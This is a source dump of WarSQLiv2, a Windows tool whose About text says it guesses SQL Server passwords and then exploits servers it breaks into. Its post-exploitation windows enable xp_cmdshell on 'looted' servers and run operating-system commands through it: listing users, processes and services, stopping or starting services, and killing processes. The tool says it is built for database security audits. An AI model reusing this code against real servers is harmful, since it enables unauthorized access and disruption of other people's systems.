/WarSQLiv2/UserControls/Attack/MSSQL/FrmReverseConnection.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmSendFileToMsSqlServer.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmServiceManager.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmServiceManager.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Windows;
7 | using System.Windows.Controls;
8 | using System.Windows.Data;
9 | using System.Windows.Documents;
10 | using System.Windows.Input;
11 | using System.Windows.Media;
12 | using System.Windows.Media.Imaging;
13 | using System.Windows.Shapes;
14 | using System.Windows.Threading;
15 | using WarSQLiv2.Exploitation.Control;
16 | using WarSQLiv2.Exploitation.PostExploitation;
17 |
18 | namespace WarSQLiv2.UserControls.Attack.MSSQL
19 | {
20 | ///
21 | /// Interaction logic for FrmServiceManager.xaml
22 | ///
23 | public partial class FrmServiceManager : Window
24 | {
25 | private readonly LanguageControl _languageControl = new LanguageControl();
26 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
27 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
28 | private int _selectedId = 0;
29 | public FrmServiceManager()
30 | {
31 | InitializeComponent();
32 | }
33 | private void Window_Loaded(object sender, RoutedEventArgs e)
34 | {
35 | _languageControl.FindLang();
36 | var lootedFileControl = new LootedFileControl();
37 | try
38 | {
39 | Dispatcher.Invoke((Action)delegate
40 | {
41 | btnGet.Content = _languageControl.SelectedLanguage.GetString("ButtonShow");
42 | Title = _languageControl.SelectedLanguage.GetString("TitleServiceManager");
43 | lootedFileControl.FileControl();
44 | var lootedList = lootedFileControl.LootedList;
45 | foreach (var t in lootedList)
46 | {
47 | lstLooted.Items.Add(t);
48 | }
49 |
50 | lstLooted.SelectedIndex = 0;
51 | var toolStripControl = new ToolStripInformation
52 | {
53 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
54 | Command = "sp_server_info",
55 | };
56 | toolStripControl.SqlServerInformation();
57 | lblStrip.Content = string.Empty;
58 | lblStrip.Content = toolStripControl.SqlServerInfo;
59 | });
60 |
61 | }
62 | catch (Exception exp)
63 | {
64 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
65 | {
66 | txtStatus.AppendText(lootedFileControl.Exception);
67 | });
68 | }
69 | }
70 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
71 | {
72 | try
73 | {
74 | Dispatcher.Invoke((Action)delegate
75 | {
76 | _selectedId = 0;
77 | _selectedId = lstLooted.SelectedIndex;
78 | lblStrip.Content = string.Empty;
79 | var toolStripControl = new ToolStripInformation
80 | {
81 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
82 | Command = "sp_server_info",
83 | };
84 | toolStripControl.SqlServerInformation();
85 | lblStrip.Content = toolStripControl.SqlServerInfo;
86 | });
87 |
88 | }
89 | catch (Exception exp)
90 | {
91 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
92 | {
93 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
94 | });
95 |
96 | }
97 | }
98 | private void btnGet_Click(object sender, RoutedEventArgs e)
99 | {
100 | var isActivated = cmdControl.isActivated;
101 | var isExecuted = cmdControl.isExecuted;
102 | lstServiceList.Items.Clear();
103 | if (isActivated == false && isExecuted == false)
104 | {
105 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
106 | try
107 | {
108 | Dispatcher.Invoke((Action)delegate
109 | {
110 | enableXpCmdShell.XpCmdShellStatus();
111 | txtStatus.AppendText(enableXpCmdShell.Result);
112 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
113 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
114 | if (contains == true)
115 | {
116 | isActivated = true;
117 | isExecuted = true;
118 | }
119 | });
120 | }
121 | catch (Exception)
122 | {
123 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
124 | {
125 | txtStatus.AppendText(enableXpCmdShell.CmdException);
126 | });
127 | }
128 | }
129 | if (isExecuted == true && isActivated == true)
130 | {
131 | try
132 | {
133 | Dispatcher.BeginInvoke((Action)delegate
134 | {
135 | lstServiceList.Items.Clear();
136 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
137 | _postExploitation.ExploitCode = "USE [master]\r\n";
138 | _postExploitation.ExploitCode += "EXEC xp_cmdshell '\"net start\"';\r\n";
139 | _postExploitation.ShowProgramList();
140 | for (int i = 0; i < _postExploitation._programList.Count; i++)
141 | {
142 | lstServiceList.Items.Add(_postExploitation._programList[i].Replace(" ", "").Replace(" ", "").Replace("\r","").Replace("\n",""));
143 | }
144 | txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageExploitTask2"));
145 | });
146 | }
147 | catch (Exception exp)
148 | {
149 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
150 | {
151 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
152 | });
153 | }
154 | }
155 | }
156 | private void MenuItemStop_Click(object sender, RoutedEventArgs e)
157 | {
158 | if (lstServiceList.SelectedIndex > -1)
159 | {
160 | var result = MessageBox.Show(_languageControl.SelectedLanguage.GetString("MessageService3"), @"WarSQLiv2", MessageBoxButton.YesNo);
161 | if (result == MessageBoxResult.Yes)
162 | {
163 | txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitTask5")}");
164 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
165 | {
166 | var srvCommand = "USE [master]\r\n";
167 | srvCommand += "EXEC xp_cmdshell '\"net stop \"" + lstServiceList.SelectedItem.ToString().Trim() + "\" /Y\"';\r\n";
168 | _postExploitation.ExploitCode = srvCommand;
169 | _postExploitation.ShowProgramList();
170 | var success = _postExploitation._programList.Count;
171 | if (success == 4)
172 | {
173 | foreach (var t in _postExploitation._programList)
174 | {
175 | txtStatus.AppendText(Environment.NewLine + t.Replace(" ", "").Replace(" ", ""));
176 | }
177 | }
178 | if (success > 4)
179 | {
180 | foreach (var t in _postExploitation._programList)
181 | {
182 | txtStatus.AppendText(Environment.NewLine + t.Replace(" ", "").Replace(" ", ""));
183 | }
184 | }
185 |
186 | });
187 | }
188 | }
189 | }
190 | private void MenuItemStart_Click(object sender, RoutedEventArgs e)
191 | {
192 | if (lstServiceList.SelectedIndex > -1)
193 | {
194 | MessageBoxResult result = MessageBox.Show(_languageControl.SelectedLanguage.GetString("MessageService3"), @"WarSQLiv2", MessageBoxButton.YesNo);
195 | if (result == MessageBoxResult.Yes)
196 | {
197 | txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitTask5")}");
198 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
199 | {
200 | var srvCommand = "USE [master]\r\n";
201 | srvCommand += "EXEC xp_cmdshell '\"net start \"" + lstServiceList.SelectedItem.ToString().Trim() + "\" /Y\"';\r\n";
202 | _postExploitation.ExploitCode = srvCommand;
203 | _postExploitation.ShowProgramList();
204 | var success = _postExploitation._programList.Count;
205 | if (success == 4)
206 | {
207 | foreach (var t in _postExploitation._programList)
208 | {
209 | txtStatus.AppendText(Environment.NewLine + t.Replace(" ", "").Replace(" ", ""));
210 | }
211 | }
212 | if (success > 4)
213 | {
214 | foreach (var t in _postExploitation._programList)
215 | {
216 | txtStatus.AppendText(Environment.NewLine + t.Replace(" ", "").Replace(" ", ""));
217 | }
218 | }
219 |
220 | });
221 | }
222 | }
223 | }
224 | }
225 | }
226 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmShowUserList.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmShowUserList.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Windows;
7 | using System.Windows.Controls;
8 | using System.Windows.Data;
9 | using System.Windows.Documents;
10 | using System.Windows.Input;
11 | using System.Windows.Media;
12 | using System.Windows.Media.Imaging;
13 | using System.Windows.Shapes;
14 | using System.Windows.Threading;
15 | using WarSQLiv2.Exploitation.Control;
16 | using WarSQLiv2.Exploitation.PostExploitation;
17 |
18 | namespace WarSQLiv2.UserControls.Attack.MSSQL
19 | {
20 | ///
21 | /// Interaction logic for FrmShowUserList.xaml
22 | ///
23 | public partial class FrmShowUserList : Window
24 | {
25 | private readonly LanguageControl _languageControl = new LanguageControl();
26 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
27 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
28 | private int _selectedId = 0;
29 | public FrmShowUserList()
30 | {
31 | InitializeComponent();
32 | }
33 | private void Window_Loaded(object sender, RoutedEventArgs e)
34 | {
35 | _languageControl.FindLang();
36 | var lootedFileControl = new LootedFileControl();
37 | try
38 | {
39 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
40 | {
41 | btnGet.Content = _languageControl.SelectedLanguage.GetString("ButtonShow");
42 | Title = _languageControl.SelectedLanguage.GetString("TitleWindowsUserList");
43 | lootedFileControl.FileControl();
44 | var lootedList = lootedFileControl.LootedList;
45 | foreach (var t in lootedList)
46 | {
47 | lstLooted.Items.Add(t);
48 | }
49 |
50 | lstLooted.SelectedIndex = 0;
51 | var toolStripControl = new ToolStripInformation
52 | {
53 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
54 | Command = "sp_server_info",
55 | };
56 | toolStripControl.SqlServerInformation();
57 | lblStrip.Content = string.Empty;
58 | lblStrip.Content = toolStripControl.SqlServerInfo;
59 | });
60 |
61 | }
62 | catch (Exception exp)
63 | {
64 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
65 | {
66 | txtStatus.AppendText(lootedFileControl.Exception);
67 | });
68 | }
69 | }
70 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
71 | {
72 | try
73 | {
74 | Dispatcher.Invoke((Action)delegate
75 | {
76 | _selectedId = 0;
77 | _selectedId = lstLooted.SelectedIndex;
78 | lblStrip.Content = string.Empty;
79 | var toolStripControl = new ToolStripInformation
80 | {
81 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
82 | Command = "sp_server_info",
83 | };
84 | toolStripControl.SqlServerInformation();
85 | lblStrip.Content = toolStripControl.SqlServerInfo;
86 | });
87 |
88 | }
89 | catch (Exception exp)
90 | {
91 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
92 | {
93 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
94 | });
95 | }
96 | }
97 | private void btnGet_Click(object sender, RoutedEventArgs e)
98 | {
99 | var isActivated = cmdControl.isActivated;
100 | var isExecuted = cmdControl.isExecuted;
101 | if (isActivated == false && isExecuted == false)
102 | {
103 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
104 | try
105 | {
106 | Dispatcher.Invoke((Action)delegate
107 | {
108 | enableXpCmdShell.XpCmdShellStatus();
109 | txtStatus.AppendText(enableXpCmdShell.Result);
110 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
111 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
112 | if (contains == true)
113 | {
114 | isActivated = true;
115 | isExecuted = true;
116 | }
117 | });
118 | }
119 | catch (Exception)
120 | {
121 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
122 | {
123 | txtStatus.AppendText(enableXpCmdShell.CmdException);
124 | });
125 | }
126 | }
127 |
128 | if (isExecuted == true && isActivated == true)
129 | {
130 | try
131 | {
132 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
133 | {
134 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
135 | _postExploitation.SqlCommand = "net user";
136 | _postExploitation.VolumeList = new List();
137 | _postExploitation.VolumeList.Clear();
138 | _postExploitation.SqlExploitation();
139 | txtStatus.AppendText(_postExploitation.ExploitResult);
140 | for (var i = 0; i < _postExploitation.VolumeList.Count; i++)
141 | {
142 | txtStatus.AppendText(_postExploitation.VolumeList[i]);
143 | }
144 | });
145 | }
146 | catch (Exception exp)
147 | {
148 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
149 | {
150 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
151 | });
152 | }
153 | }
154 | }
155 | }
156 | }
157 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmSystemInfo.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmTaskManager.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmTaskManager.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Windows;
3 | using System.Windows.Controls;
4 | using System.Windows.Threading;
5 | using WarSQLiv2.Exploitation.Control;
6 | using WarSQLiv2.Exploitation.PostExploitation;
7 |
8 | namespace WarSQLiv2.UserControls.Attack.MSSQL
9 | {
10 | ///
11 | /// Interaction logic for FrmTaskManager.xaml
12 | ///
13 | public partial class FrmTaskManager : Window
14 | {
15 | private readonly LanguageControl _languageControl = new LanguageControl();
16 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
17 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
18 | private int _selectedId = 0;
19 | public FrmTaskManager()
20 | {
21 | InitializeComponent();
22 | }
23 | private void Window_Loaded(object sender, RoutedEventArgs e)
24 | {
25 | _languageControl.FindLang();
26 | var lootedFileControl = new LootedFileControl();
27 | try
28 | {
29 | Dispatcher.Invoke((Action)delegate
30 | {
31 | btnGet.Content = _languageControl.SelectedLanguage.GetString("ButtonShow");
32 | Title = _languageControl.SelectedLanguage.GetString("TitleAllPrograms");
33 | lootedFileControl.FileControl();
34 | var lootedList = lootedFileControl.LootedList;
35 | foreach (var t in lootedList)
36 | {
37 | lstLooted.Items.Add(t);
38 | }
39 |
40 | lstLooted.SelectedIndex = 0;
41 | var toolStripControl = new ToolStripInformation
42 | {
43 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
44 | Command = "sp_server_info",
45 | };
46 | toolStripControl.SqlServerInformation();
47 | lblStrip.Content = string.Empty;
48 | lblStrip.Content = toolStripControl.SqlServerInfo;
49 | });
50 |
51 | }
52 | catch (Exception exp)
53 | {
54 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
55 | {
56 | txtStatus.AppendText(lootedFileControl.Exception);
57 | });
58 | }
59 | }
60 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
61 | {
62 | try
63 | {
64 | Dispatcher.Invoke((Action)delegate
65 | {
66 | _selectedId = 0;
67 | _selectedId = lstLooted.SelectedIndex;
68 | lblStrip.Content = string.Empty;
69 | var toolStripControl = new ToolStripInformation
70 | {
71 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
72 | Command = "sp_server_info",
73 | };
74 | toolStripControl.SqlServerInformation();
75 | lblStrip.Content = toolStripControl.SqlServerInfo;
76 | });
77 |
78 | }
79 | catch (Exception exp)
80 | {
81 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
82 | {
83 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
84 | });
85 |
86 | }
87 | }
88 | private void btnGet_Click(object sender, RoutedEventArgs e)
89 | {
90 | var isActivated = cmdControl.isActivated;
91 | var isExecuted = cmdControl.isExecuted;
92 | if (isActivated == false && isExecuted == false)
93 | {
94 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
95 | try
96 | {
97 | Dispatcher.Invoke((Action)delegate
98 | {
99 | enableXpCmdShell.XpCmdShellStatus();
100 | txtStatus.AppendText(enableXpCmdShell.Result);
101 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
102 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
103 | if (contains == true)
104 | {
105 | isActivated = true;
106 | isExecuted = true;
107 | }
108 | });
109 | }
110 | catch (Exception)
111 | {
112 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
113 | {
114 | txtStatus.AppendText(enableXpCmdShell.CmdException);
115 | });
116 | }
117 | }
118 | if (isExecuted == true && isActivated == true)
119 | {
120 | try
121 | {
122 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
123 | {
124 | lstTaskList.Items.Clear();
125 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
126 | _postExploitation.ExploitCode = "EXEC xp_cmdshell '\"TASKLIST /V /FO CSV\"'";
127 | _postExploitation.ShowProgramList();
128 | for (var i = 0; i < _postExploitation._programList.Count; i++)
129 | {
130 | lstTaskList.Items.Add(_postExploitation._programList[i].Replace("\"", "").Replace("\r","").Replace("\n",""));
131 | }
132 | txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageExploitTask2"));
133 | });
134 | }
135 | catch (Exception exp)
136 | {
137 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
138 | {
139 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
140 | });
141 | }
142 | }
143 | }
144 | private void lstTaskList_SelectionChanged(object sender, SelectionChangedEventArgs e)
145 | {
146 | if (lstTaskList.SelectedIndex > -1)
147 | {
148 | MessageBoxResult result = MessageBox.Show(_languageControl.SelectedLanguage.GetString("MessageExploitTask3"), @"WarSQLiv2", MessageBoxButton.YesNo);
149 | if (result == MessageBoxResult.Yes)
150 | {
151 | txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitTask5")}");
152 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
153 | {
154 | var killTask = lstTaskList.SelectedItem.ToString().Trim().Split(',');
155 | var taskCommand = "USE [master]\r\n";
156 | taskCommand += "EXEC xp_cmdshell '\"TASKKILL /PID " + killTask[1].Trim().Replace("\"", "") + " /T /F\"';\r\n";
157 | _postExploitation.ExploitCode = taskCommand;
158 | _postExploitation.ShowProgramList();
159 | var errorx = _postExploitation._programList.Count;
160 | if(errorx == 3)
161 | {
162 | for (var i = 0; i < _postExploitation._programList.Count; i++)
163 | {
164 | txtStatus.AppendText(_postExploitation._programList[i].Replace("\"", ""));
165 | }
166 | }
167 | else if (errorx == 2)
168 | {
169 | for (var i = 0; i < _postExploitation._programList.Count; i++)
170 | {
171 | txtStatus.AppendText(_postExploitation._programList[i].Replace("\"", ""));
172 | }
173 | }
174 |
175 | });
176 | }
177 | }
178 | }
179 | }
180 | }
181 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Help/FrmAbout.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Help/FrmAbout.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Resources;
6 | using System.Text;
7 | using System.Threading.Tasks;
8 | using System.Windows;
9 | using System.Windows.Controls;
10 | using System.Windows.Data;
11 | using System.Windows.Documents;
12 | using System.Windows.Input;
13 | using System.Windows.Media;
14 | using System.Windows.Media.Imaging;
15 | using System.Windows.Shapes;
16 | using WarSQLiv2.Exploitation.Control;
17 |
18 | namespace WarSQLiv2.UserControls.Help
19 | {
20 | ///
21 | /// Interaction logic for FrmAbout.xaml
22 | ///
23 | public partial class FrmAbout : Window
24 | {
25 | private readonly LanguageControl _languageControl = new LanguageControl();
26 | public FrmAbout()
27 | {
28 | InitializeComponent();
29 | }
30 | private void Window_Loaded(object sender, RoutedEventArgs e)
31 | {
32 | Dispatcher.Invoke((Action)delegate
33 | {
34 | _languageControl.FindLang();
35 | _languageControl.SelectedLanguage = new ResourceManager("WarSQLiv2.Language." + _languageControl.LoadedLang,
36 | Assembly.GetExecutingAssembly());
37 | Title = _languageControl.SelectedLanguage.GetString("TitleAbout");
38 | lblVersion.Content = "Application Name: " + Application.ResourceAssembly.ToString();
39 | lblVersion.Content += Environment.NewLine + "Description: " + ((AssemblyDescriptionAttribute)Attribute.GetCustomAttribute(Assembly.GetExecutingAssembly(), typeof(AssemblyDescriptionAttribute), false)).Description;
40 | lblVersion.Content += Environment.NewLine + "Company: " + ((AssemblyCompanyAttribute)Attribute.GetCustomAttribute(Assembly.GetExecutingAssembly(), typeof(AssemblyCompanyAttribute), false)).Company;
41 | lblVersion.Content += Environment.NewLine + "Copyright: " + ((AssemblyCopyrightAttribute)Attribute.GetCustomAttribute(Assembly.GetExecutingAssembly(), typeof(AssemblyCopyrightAttribute), false)).Copyright;
42 | txtDescription.AppendText(string.Format(Environment.NewLine + "Bu program SQL Sunuculara şifre denemeleri yapan ve bu şifre denemelerinin başarılı olması halinde sistemi exploit edebilen bir araçtır.{0}", Environment.NewLine));
43 | txtDescription.AppendText($"Bu araç SQL veritabanı güvenliği denetimleri için geliştirilmiştir. Kötüye kullanılması durumunda geliştiricinin herhangi bir yasal yükümlülüğü bulunmamaktadır. Programı kullanan herkes bu şartı kabul etmiş sayılır.{Environment.NewLine}");
44 | txtDescription.AppendText($"Katkılarından dolayı Kriptondan yardıma koşan süpermene ve aşağıda adları yazılı saz arkadaşlarına teşekkür ederim.{Environment.NewLine}");
45 | txtDescription.AppendText($"- Hamza Şamlıoğlu{Environment.NewLine}");
46 | txtDescription.AppendText($"- Betül Erdem{Environment.NewLine}");
47 | txtDescription.AppendText($"- İsmail Saygılı{Environment.NewLine}");
48 | txtDescription.AppendText($"- Muhammet Dilmaç{Environment.NewLine}");
49 | txtDescription.AppendText($"- Tolga Sezer{Environment.NewLine}");
50 | });
51 | }
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/WarSQLiAttack.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
--------------------------------------------------------------------------------
/WarSQLiv2/WarSQLiv2.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | publish\
5 |
6 | http://eyupcelik.com.tr
7 |
8 |
9 |
10 | en-US
11 | false
12 |
13 |
--------------------------------------------------------------------------------
/WarSQLiv2/WarSQLiv2_TemporaryKey.pfx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/WarSQLiv2_TemporaryKey.pfx
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/FoundServer/SqlServerList.txt:
--------------------------------------------------------------------------------
1 | 127.0.0.1:1433
2 |
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Lang/Lang.txt:
--------------------------------------------------------------------------------
1 | Turkish
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/1.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/1.txt:
--------------------------------------------------------------------------------
1 | o o o-o o-o o -- o-o
2 | | | | o o | o o o o /o
3 | o o o oo o-o o-o | | | o o / | / |
4 | \ / \ / | | | | o O | | \ / / o/ o
5 | o o o-o-o o--o o-O\ O---o| o o--o O o-o
6 |
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/10.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/10.txt:
--------------------------------------------------------------------------------
1 | _______ _______ _______ _______ _ _________
2 | |\ /|( ___ )( ____ )( ____ \( ___ )( \ \__ __/
3 | | ) ( || ( ) || ( )|| ( \/| ( ) || ( ) (
4 | | | _ | || (___) || (____)|| (_____ | | | || | | |
5 | | |( )| || ___ || __)(_____ )| | | || | | |
6 | | || || || ( ) || (\ ( ) || | /\| || | | |
7 | | () () || ) ( || ) \ \__/\____) || (_\ \ || (____/\___) (___
8 | (_______)|/ \||/ \__/\_______)(____\/_)(_______/\_______/
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/11.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/11.txt:
--------------------------------------------------------------------------------
1 | '##:::::'##::::'###::::'########:::'######:::'#######::'##:::::::'####:
2 | ##:'##: ##:::'## ##::: ##.... ##:'##... ##:'##.... ##: ##:::::::. ##::
3 | ##: ##: ##::'##:. ##:: ##:::: ##: ##:::..:: ##:::: ##: ##:::::::: ##::
4 | ##: ##: ##:'##:::. ##: ########::. ######:: ##:::: ##: ##:::::::: ##::
5 | ##: ##: ##: #########: ##.. ##::::..... ##: ##:'## ##: ##:::::::: ##::
6 | ##: ##: ##: ##.... ##: ##::. ##::'##::: ##: ##:.. ##:: ##:::::::: ##::
7 | . ###. ###:: ##:::: ##: ##:::. ##:. ######::: ##### ##: ########:'####:
8 | :...::...:::..:::::..::..:::::..:::......::::.....:..::........::....::
9 |
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/12.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/12.txt:
--------------------------------------------------------------------------------
1 | ___ __ _________________________ ______ _______
2 | __ | / /_____ _________ ___/_ __ \__ /___(_) ___ ___|__ \ __ __ \
3 | __ | /| / /_ __ `/_ ___/____ \_ / / /_ / __ / __ | / /___/ / _ / / /
4 | __ |/ |/ / / /_/ /_ / ____/ // /_/ /_ /___ / __ |/ /_ __/__/ /_/ /
5 | ____/|__/ \__,_/ /_/ /____/ \___\_\/_____/_/ _____/ /____/(_)____/
6 |
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/13.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/13.txt:
--------------------------------------------------------------------------------
1 |
2 | ##
3 | ## ###
4 | ## ## ######## ####### #### ##### ### ###
5 | ## # ## ## ## ### ## ## ### ###
